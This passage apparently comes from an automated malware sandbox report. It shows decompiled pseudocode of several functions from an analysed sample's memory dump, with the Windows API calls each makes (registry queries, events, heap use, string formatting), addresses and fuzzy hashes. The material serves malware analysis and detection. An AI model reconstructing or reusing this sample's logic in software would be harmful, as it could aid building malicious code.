				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E01204BAC( &_v32, _t39);
					goto L13;
				}
			}














                                                        0x012074cb
                                                        0x012074d8
                                                        0x012074de
                                                        0x012074df
                                                        0x012074e0
                                                        0x012074e1
                                                        0x012074e2
                                                        0x012074e6
                                                        0x012074ed
                                                        0x012074f2
                                                        0x012074f6
                                                        0x0120757e
                                                        0x0120757e
                                                        0x01207581
                                                        0x01207583
                                                        0x0120758b
                                                        0x01207591
                                                        0x01207594
                                                        0x01207594
                                                        0x01207591
                                                        0x0120759f
                                                        0x0120759f
                                                        0x01207502
                                                        0x01207509
                                                        0x0120750b
                                                        0x0120750b
                                                        0x01207522
                                                        0x01207526
                                                        0x01207529
                                                        0x01207534
                                                        0x0120753b
                                                        0x0120753b
                                                        0x01207547
                                                        0x01207548
                                                        0x01207556
                                                        0x0120754a
                                                        0x0120754a
                                                        0x0120754b
                                                        0x0120754c
                                                        0x0120754d
                                                        0x0120754e
                                                        0x0120754f
                                                        0x0120754f
                                                        0x0120755b
                                                        0x01207560
                                                        0x01207562
                                                        0x01207564
                                                        0x01207564
                                                        0x0120756b
                                                        0x00000000
                                                        0x0120756d
                                                        0x0120756d
                                                        0x0120757a
                                                        0x00000000
                                                        0x0120757a

                                                        APIs
                                                        • CreateEventA.KERNEL32(0120A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0120519C,?,00000001), ref: 0120751C
                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,0120519C,?,00000001,01204579,00000002,?,?,01204579), ref: 01207529
                                                        • Sleep.KERNELBASE(00000BB8,?,?,?,?,0120519C,?,00000001,01204579,00000002,?,?,01204579), ref: 01207534
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0120519C,?,00000001,01204579,00000002,?,?,01204579), ref: 0120753B
                                                          • Part of subcall function 01203D85: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,0120755B,?), ref: 01203DAB
                                                          • Part of subcall function 01203D85: RegEnumKeyExA.KERNELBASE(?,?,?,0120755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,0120755B), ref: 01203DF2
                                                          • Part of subcall function 01203D85: WaitForSingleObject.KERNEL32(00000000,?,?,?,0120755B,?,0120755B,?,?,?,?,?,0120755B,?), ref: 01203E5F
                                                          • Part of subcall function 01203D85: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,0120755B,?,?,?,?,?,0120519C,?), ref: 01203E87
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                                        • String ID:
                                                        • API String ID: 891522397-0
                                                        • Opcode ID: 653087418e9ea925f5aa4ec9fd9516dcd020bede91d8b96d33771435220af5cc
                                                        • Instruction ID: e4d02fc2c7e9db2e07f2be103af6033d96a1f12fabc5b171f9f0aa6c6f7f1e37
                                                        • Opcode Fuzzy Hash: 653087418e9ea925f5aa4ec9fd9516dcd020bede91d8b96d33771435220af5cc
                                                        • Instruction Fuzzy Hash: C321DA72D10256ABDF23AFE8A4848EE7B79AF44250F014629FF55A7182D731F940CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01203B91, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01203B91(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E01205FBC(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E012013CC(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E012031D9(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                                        0x01203b9d
                                                        0x01203bc0
                                                        0x01203bca
                                                        0x01203bd0
                                                        0x01203bd4
                                                        0x01203bec
                                                        0x01203bf1
                                                        0x01203c39
                                                        0x01203bf3
                                                        0x01203bfb
                                                        0x01203bff
                                                        0x01203c36
                                                        0x01203c01
                                                        0x01203c13
                                                        0x01203c17
                                                        0x01203c2d
                                                        0x01203c19
                                                        0x01203c1c
                                                        0x01203c1e
                                                        0x01203c23
                                                        0x01203c28
                                                        0x01203c28
                                                        0x01203c23
                                                        0x01203c17
                                                        0x01203bff
                                                        0x01203c41
                                                        0x01203c41
                                                        0x01203c48
                                                        0x01203c4e
                                                        0x01203c4e
                                                        0x01203bb6
                                                        0x01203bba
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • RegOpenKeyW.ADVAPI32(80000002,05769DC4,05769DC4), ref: 01203BCA
                                                        • RegQueryValueExW.KERNELBASE(05769DC4,?,00000000,80000002,00000000,00000000,?,01205527,3D012090,80000002,0120755B,00000000,0120755B,?,05769DC4,80000002), ref: 01203BEC
                                                        • RegQueryValueExW.ADVAPI32(05769DC4,?,00000000,80000002,00000000,00000000,00000000,?,01205527,3D012090,80000002,0120755B,00000000,0120755B,?,05769DC4), ref: 01203C11
                                                        • RegCloseKey.ADVAPI32(05769DC4,?,01205527,3D012090,80000002,0120755B,00000000,0120755B,?,05769DC4,80000002,00000000,?), ref: 01203C41
                                                          • Part of subcall function 012031D9: SafeArrayDestroy.OLEAUT32(00000000), ref: 0120325E
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                        • String ID:
                                                        • API String ID: 486277218-0
                                                        • Opcode ID: ae002feb951d61d5abff917e8292559e58f0459effe929c1a4db8c6ef40b51bc
                                                        • Instruction ID: 4924fbd107d73be0c3e27be8c5f5f6f0bd6bf1a8f8e6cf75e99fb8d2402c790e
                                                        • Opcode Fuzzy Hash: ae002feb951d61d5abff917e8292559e58f0459effe929c1a4db8c6ef40b51bc
                                                        • Instruction Fuzzy Hash: B7212A7201015EAFDF12EF95DC80CEE7B69FB08250B048225FE1597161D3319D649B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120142C, Relevance: 4.6, APIs: 3, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 18%
                                                        			E0120142C(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t64;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t62 = __esi + 0x2c;
				_v16 = 0;
				 *_t62 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t62);
				_t63 = __imp__; // 0x7029fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t63() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E01205FBC(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t63() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t64 = E01205FBC(_v8 + 1);
							if(_t64 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t64, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t64;
							}
						}
						E012013CC(_v20);
					}
					goto L12;
				}
			}












                                                        0x01201432
                                                        0x0120143b
                                                        0x0120143e
                                                        0x01201441
                                                        0x01201443
                                                        0x01201446
                                                        0x01201527
                                                        0x0120152d
                                                        0x0120152d
                                                        0x01201450
                                                        0x01201457
                                                        0x0120145f
                                                        0x0120151e
                                                        0x01201524
                                                        0x00000000
                                                        0x01201524
                                                        0x01201468
                                                        0x0120146c
                                                        0x0120146d
                                                        0x0120146e
                                                        0x01201474
                                                        0x01201475
                                                        0x0120147a
                                                        0x01201481
                                                        0x00000000
                                                        0x01201487
                                                        0x01201496
                                                        0x01201499
                                                        0x0120149c
                                                        0x012014a5
                                                        0x012014ac
                                                        0x012014af
                                                        0x01201515
                                                        0x012014b1
                                                        0x012014b4
                                                        0x012014b8
                                                        0x012014b9
                                                        0x012014ba
                                                        0x012014bb
                                                        0x012014bd
                                                        0x012014c4
                                                        0x01201508
                                                        0x012014c6
                                                        0x012014c6
                                                        0x012014cf
                                                        0x012014dd
                                                        0x012014e1
                                                        0x012014f9
                                                        0x012014e3
                                                        0x012014ec
                                                        0x012014f4
                                                        0x012014f4
                                                        0x012014e1
                                                        0x0120150e
                                                        0x0120150e
                                                        0x00000000
                                                        0x012014af

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 0120151E
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • wcstombs.NTDLL ref: 012014EC
                                                        • GetLastError.KERNEL32 ref: 01201502
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ErrorLast$AllocateHeapwcstombs
                                                        • String ID:
                                                        • API String ID: 2631933831-0
                                                        • Opcode ID: df13acccafdab3f7a4828e862d2d127e0a5cb793411386401c566639809deda5
                                                        • Instruction ID: 372954babe1b14e3d93d32bbe9eed7711445b7a84cf7a3cd38b9b8c5991223bb
                                                        • Opcode Fuzzy Hash: df13acccafdab3f7a4828e862d2d127e0a5cb793411386401c566639809deda5
                                                        • Instruction Fuzzy Hash: 38317EB5910209FFEB22DF94D884DAEFBB8FF18304F144659E502E3292D771DA548B20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205335, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01205335(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0120249F(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x120a2d4; // 0x455d5a8
				_t4 = _t24 + 0x120bd70; // 0x5769318
				_t5 = _t24 + 0x120bd18; // 0x4f0053
				_t26 = E012011B0( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x120a2d4; // 0x455d5a8
						_t11 = _t32 + 0x120bd64; // 0x576930c
						_t48 = _t11;
						_t12 = _t32 + 0x120bd18; // 0x4f0053
						_t52 = E01201370(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x120a2d4; // 0x455d5a8
							_t13 = _t35 + 0x120bdae; // 0x30314549
							_t37 = E0120609A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x120a2b4 - 6;
								if( *0x120a2b4 <= 6) {
									_t42 =  *0x120a2d4; // 0x455d5a8
									_t15 = _t42 + 0x120bbba; // 0x52384549
									E0120609A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x120a2d4; // 0x455d5a8
							_t17 = _t38 + 0x120bda8; // 0x5769350
							_t18 = _t38 + 0x120bd80; // 0x680043
							_t40 = E0120304F(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x120a290, 0, _t52);
						}
					}
					HeapFree( *0x120a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E0120243E(_t54);
				}
				return _t45;
			}




















                                                        0x01205335
                                                        0x01205345
                                                        0x01205348
                                                        0x0120534f
                                                        0x01205351
                                                        0x01205351
                                                        0x01205354
                                                        0x01205359
                                                        0x01205360
                                                        0x0120536d
                                                        0x01205372
                                                        0x01205376
                                                        0x01205384
                                                        0x01205392
                                                        0x01205396
                                                        0x01205427
                                                        0x01205427
                                                        0x0120539c
                                                        0x0120539c
                                                        0x012053a1
                                                        0x012053a1
                                                        0x012053a8
                                                        0x012053b4
                                                        0x012053b6
                                                        0x012053b8
                                                        0x012053ba
                                                        0x012053c1
                                                        0x012053cc
                                                        0x012053d3
                                                        0x012053d5
                                                        0x012053dc
                                                        0x012053de
                                                        0x012053e5
                                                        0x012053f0
                                                        0x012053f0
                                                        0x012053dc
                                                        0x012053f5
                                                        0x012053fa
                                                        0x01205401
                                                        0x01205411
                                                        0x0120541f
                                                        0x01205421
                                                        0x01205421
                                                        0x012053b8
                                                        0x01205433
                                                        0x01205433
                                                        0x01205435
                                                        0x0120543a
                                                        0x0120543c
                                                        0x0120543c
                                                        0x01205447

                                                        APIs
                                                        • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05769318,00000000,?,74B5F710,00000000,74B5F730), ref: 01205384
                                                        • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05769350,?,00000000,30314549,00000014,004F0053,0576930C), ref: 01205421
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01205131), ref: 01205433
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 5df14c1c4202ef62e97752e6a70a4b711ecdc7b99ebfd6a090d28c930e012de7
                                                        • Instruction ID: fb218d73e9a0b6ff6e0203d8f4e3a2049f18d483b430415bd283c5d859ef54ff
                                                        • Opcode Fuzzy Hash: 5df14c1c4202ef62e97752e6a70a4b711ecdc7b99ebfd6a090d28c930e012de7
                                                        • Instruction Fuzzy Hash: 9D31A13161021ABFDB23DFA4ED88EEE7BBDEB48700F510265F604A7093D6719A08DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205242, Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E01205242(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x120a2d4; // 0x455d5a8
				_t2 = _t22 + 0x120b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x120a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x120a2a4 =  *0x120a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E012056BF(_t49, _t48); // executed
					_t33 = E01206997(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x120a2a4 < 5) {
							 *0x120a2a4 =  *0x120a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E01203546();
					HeapFree( *0x120a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x120a390; // 0x5768d6c
				if(RtlAllocateHeap( *0x120a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E0120254C(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
				goto L5;
			}















                                                        0x01205242
                                                        0x01205242
                                                        0x01205249
                                                        0x01205250
                                                        0x01205254
                                                        0x01205259
                                                        0x01205264
                                                        0x01205274
                                                        0x012052b7
                                                        0x012052bb
                                                        0x012052bf
                                                        0x012052c0
                                                        0x012052c3
                                                        0x012052c8
                                                        0x012052c8
                                                        0x012052cb
                                                        0x012052cf
                                                        0x01205309
                                                        0x01205309
                                                        0x0120530f
                                                        0x01205316
                                                        0x01205316
                                                        0x012052d1
                                                        0x012052d4
                                                        0x012052d6
                                                        0x012052e3
                                                        0x012052e5
                                                        0x012052ec
                                                        0x01205323
                                                        0x01205328
                                                        0x0120532a
                                                        0x0120532c
                                                        0x0120532c
                                                        0x00000000
                                                        0x0120532a
                                                        0x012052ee
                                                        0x012052f5
                                                        0x01205303
                                                        0x00000000
                                                        0x01205303
                                                        0x01205276
                                                        0x01205291
                                                        0x012052ab
                                                        0x00000000
                                                        0x012052ab
                                                        0x012052a4
                                                        0x00000000

                                                        APIs
                                                        • wsprintfA.USER32 ref: 01205264
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01205289
                                                          • Part of subcall function 0120254C: GetTickCount.KERNEL32 ref: 01202563
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 012025B0
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 012025CD
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 012025ED
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 0120260B
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 0120262E
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 0120264F
                                                        • HeapFree.KERNEL32(00000000,0120517B,?,?,0120517B,?), ref: 01205303
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                        • String ID:
                                                        • API String ID: 2794511967-0
                                                        • Opcode ID: 869792b6d2f837a4b581c518fc202f6095275b48150f0061139b0145fe8d2e1c
                                                        • Instruction ID: 6b7cb7a1d52d77efd9656f00c7d0cb4d5fa76a6a4af4275a44b65917ee29e2c6
                                                        • Opcode Fuzzy Hash: 869792b6d2f837a4b581c518fc202f6095275b48150f0061139b0145fe8d2e1c
                                                        • Instruction Fuzzy Hash: BF314F72510219EFDB13DF64E888A9A3BBDFF48344F104222F906AB282D7719654CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012015AB, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E012015AB(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x120a290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E012077FF(_t57 - _a4, _a4, _t48);
							_t38 = E012077FF(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E012077FF(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                                        0x012015b3
                                                        0x012015b8
                                                        0x012015ba
                                                        0x012015c1
                                                        0x012015d3
                                                        0x012015d3
                                                        0x012015d7
                                                        0x012015d9
                                                        0x012015dc
                                                        0x012015df
                                                        0x012015e8
                                                        0x012015f2
                                                        0x012015f6
                                                        0x012015fb
                                                        0x0120160b
                                                        0x01201611
                                                        0x01201615
                                                        0x01201664
                                                        0x01201617
                                                        0x01201617
                                                        0x01201620
                                                        0x0120162f
                                                        0x01201634
                                                        0x01201641
                                                        0x0120164a
                                                        0x01201655
                                                        0x0120165c
                                                        0x01201660
                                                        0x01201660
                                                        0x01201615
                                                        0x0120166b
                                                        0x01201672

                                                        APIs
                                                        • lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 012015DF
                                                        • StrStrA.SHLWAPI(00000000,?), ref: 012015EC
                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0120160B
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocateHeaplstrlen
                                                        • String ID:
                                                        • API String ID: 556738718-0
                                                        • Opcode ID: 47b651867819d2aa0ae3a64481f1a2db155a4c1fd1a1c71d4761553ce1933b3a
                                                        • Instruction ID: 142a386b9ad9675756a4b97a418942185e06c4758351a0815a01cc9b6d73361c
                                                        • Opcode Fuzzy Hash: 47b651867819d2aa0ae3a64481f1a2db155a4c1fd1a1c71d4761553ce1933b3a
                                                        • Instruction Fuzzy Hash: 4821513560024AAFCB12DF6CD884B9EBFB5EF85354F088255E94497346C770E915CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206793, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01206793(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x120a2d4; // 0x455d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x120ba40; // 0x4f0053
				_v16 = 4;
				_t31 = E01207206(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x120a2d4; // 0x455d5a8
					_t5 = _t19 + 0x120ba9c; // 0x6e0049
					_t34 = E01207206(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E012013CC(_t34);
					}
					E012013CC(_t31);
				}
				return _v8;
			}













                                                        0x01206799
                                                        0x0120679e
                                                        0x012067a3
                                                        0x012067aa
                                                        0x012067b6
                                                        0x012067ba
                                                        0x012067bc
                                                        0x012067c2
                                                        0x012067ce
                                                        0x012067d2
                                                        0x012067e5
                                                        0x012067ed
                                                        0x01206801
                                                        0x01206809
                                                        0x0120680b
                                                        0x0120680b
                                                        0x01206812
                                                        0x01206812
                                                        0x01206819
                                                        0x01206819
                                                        0x0120681f
                                                        0x01206824
                                                        0x0120682a

                                                        APIs
                                                          • Part of subcall function 01207206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,012067B6,004F0053,00000000,?), ref: 0120720F
                                                          • Part of subcall function 01207206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,012067B6,004F0053,00000000,?), ref: 01207239
                                                          • Part of subcall function 01207206: memset.NTDLL ref: 0120724D
                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 012067E5
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 01206801
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01206812
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 830012212-0
                                                        • Opcode ID: 794674be5866532c2241e095021fb48634ea7e5f5514ad46de81192859d7cdba
                                                        • Instruction ID: fc2292e743a589a3b411bd3ae1112cf8055707655f8aa123541e0d7bf18513e0
                                                        • Opcode Fuzzy Hash: 794674be5866532c2241e095021fb48634ea7e5f5514ad46de81192859d7cdba
                                                        • Instruction Fuzzy Hash: E011127651020ABFE723DBD8DC89FAE77BCAB44604F144255E605E7087EB70D6189B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012041D4, Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E012041D4(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E01205FBC(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x120a324, 0x110);
					_t27 =  *0x120a328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
